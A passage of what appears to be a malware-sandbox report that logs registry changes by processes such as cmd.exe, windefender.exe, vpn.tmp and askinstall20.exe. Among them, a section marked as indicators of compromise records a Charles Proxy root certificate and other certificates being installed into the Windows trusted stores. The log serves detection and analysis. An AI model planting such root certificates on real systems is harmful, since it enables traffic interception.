Settings\Cache\Cookies\CachePrefix = "Cookie:" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c60600256e15d701 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000a7e45a95cf4cc7124170a19eb8f124579fa914a0f3cdc699ec7c5c6bf81b07c6ce3a74e554ead5dfcfb7e5f1f4cfc2320705bb5a8f6f7e7ae6f0 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{1D2CCF72-3C4B-46E3-BDAC-47184CC1942C}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 windefender.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{A9203F78-4761-4E9E-8CCC-26E5B4333426}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "v692mij" chrome.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created 